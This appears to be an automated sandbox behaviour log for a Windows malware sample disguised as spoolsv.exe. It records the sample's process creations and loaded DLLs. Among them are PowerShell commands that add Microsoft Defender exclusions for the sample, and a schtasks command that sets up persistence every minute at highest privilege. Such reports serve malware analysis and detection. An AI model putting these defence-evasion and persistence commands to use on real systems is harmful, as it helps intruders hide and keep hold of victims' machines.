                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'spoolsv.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'spoolsv.exe'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe"
                            Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\spoolsv.exe C:\Users\user~1\AppData\Local\Temp\spoolsv.exe
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\spoolsv.exe "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\spoolsv.exe "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\spoolsv.exe C:\Users\user~1\AppData\Local\Temp\spoolsv.exe
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Users\user\AppData\Local\Temp\attzwu.exe "C:\Users\user\AppData\Local\Temp\attzwu.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\spoolsv.exe C:\Users\user~1\AppData\Local\Temp\spoolsv.exe
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\spoolsv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'spoolsv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\spoolsv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'spoolsv.exe'Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "spoolsv" /tr "C:\Users\user~1\AppData\Local\Temp\spoolsv.exe"Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeProcess created: C:\Users\user\AppData\Local\Temp\attzwu.exe "C:\Users\user\AppData\Local\Temp\attzwu.exe" Jump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: avicap32.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: msvfw32.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: winmm.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: windowscodecs.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\spoolsv.exeSection loaded: vaultcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: cryptbase.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\spoolsv.exeSection loaded: sspicli.dll
